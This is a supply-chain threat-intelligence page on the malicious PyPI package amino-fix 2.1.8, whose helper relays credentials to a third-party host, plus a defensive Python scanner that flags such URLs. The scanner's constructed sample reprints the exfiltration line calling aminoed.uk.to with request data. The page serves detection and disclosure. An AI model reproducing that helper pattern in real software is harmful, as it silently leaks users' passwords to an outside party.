Supply-chain threat intelligence

Incident detail

critical · pypi · credential theft · osv

Malicious code in amino-fix (PyPI)

amino-fix

Risk score

92

AI summary

Indexed incident for amino-fix (pypi).

Description

The asyncfix subpackage's signature() helper in aminofix/asyncfix/lib/util/helpers.py (lines 22-25) does not compute the NDC-MSG-SIG locally. Instead, every JSON request body is sent as a query string to http://aminoed.uk.to/api/generator/ndc-msg-sig?data={data} over unencrypted HTTP. This helper is invoked by every authenticated endpoint of the library, including client.login(email, password), the advertised primary function. As a result, any caller using the async API silently transmits the end-user's plaintext email and password (and every other request body) as URL query parameters to aminoed.uk.to, a free .uk.to subdomain unrelated to the real Amino service (service.narvii.com). This is a textbook silent relay: a hardcoded third-party destination embedded in public API code that exfiltrates caller-supplied credentials without disclosure, over plaintext HTTP with no TLS, so the credentials are also readable by anyone on the network path. A secondary import-time version check against pypi.org is benign (data-only, printed to stdout) and not a dropper; it is noted only as an unrelated quality issue.
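The pattern above (a request body handed to a hardcoded, plaintext, non-first-party endpoint as a query string) can be caught before the package is ever imported by scanning its source for URL literals. The script below is an added example written for this page, not code from the advisory or from amino-fix: it walks a Python source tree with the `ast` module, pulls URLs out of string constants (including the literal parts of f-strings), and flags any that use plain `http`, point at a host outside an expected allowlist, or carry request data in the query string. The allowlist (service.narvii.com, with pypi.org tolerated for the benign version check) comes from the advisory; the embedded `SAMPLE` source is a constructed stand-in that mirrors the described helper, not the package's actual code.

```python
import ast
import os
import re
from urllib.parse import urlsplit

# Hosts a legitimate Amino client is expected to contact (service.narvii.com),
# plus pypi.org for the benign version check the advisory mentions.
EXPECTED_HOSTS = {"service.narvii.com", "pypi.org"}

URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def extract_urls(source: str):
    """Yield (lineno, url) for every URL-looking string constant in the source.

    Literal fragments of f-strings are ast.Constant nodes inside ast.JoinedStr,
    so f"http://host/path?data={data}" still surfaces as "http://host/path?data=".
    """
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            for match in URL_RE.finditer(node.value):
                yield getattr(node, "lineno", 0), match.group(0)


def classify(url: str):
    """Return the list of concerns for one URL (empty list means it looks fine)."""
    parts = urlsplit(url)
    findings = []
    if parts.scheme == "http":
        findings.append("plaintext-http")
    if parts.hostname not in EXPECTED_HOSTS:
        findings.append("unexpected-host")
    if parts.query:
        # Request data spliced into the query string ends up in proxy and server
        # logs and in the target's access logs, which is the exfiltration path here.
        findings.append("data-in-query")
    return findings


def scan_source(source: str, filename: str = "<string>"):
    """Scan one module; return only the URLs that raised at least one concern."""
    results = []
    for lineno, url in extract_urls(source):
        findings = classify(url)
        if findings:
            results.append({"file": filename, "line": lineno, "url": url, "findings": findings})
    return results


def scan_package(root: str):
    """Scan every .py file under an installed package directory (site-packages/aminofix)."""
    results = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(".py"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    results.extend(scan_source(fh.read(), path))
    return results


# Constructed sample mimicking the helper the advisory describes; not the real file.
SAMPLE = '''
import requests

def signature(data):
    # constructed stand-in: remote "signature" service instead of a local computation
    return requests.get(f"http://aminoed.uk.to/api/generator/ndc-msg-sig?data={data}").text

def check_version():
    return requests.get("https://pypi.org/pypi/amino-fix/json").json()
'''


if __name__ == "__main__":
    for hit in scan_source(SAMPLE, "helpers.py"):
        print(f"{hit['file']}:{hit['line']} {hit['url']} -> {', '.join(hit['findings'])}")
```

Run `scan_package(os.path.dirname(aminofix.__file__))` against an installed copy to audit the real package; any hit carrying all three tags at once is the exact shape described above and warrants treating the package as hostile rather than merely sloppy.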

Technical details

Affected versions

= 2.1.8

Indicators

  • affected version = 2.1.8 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents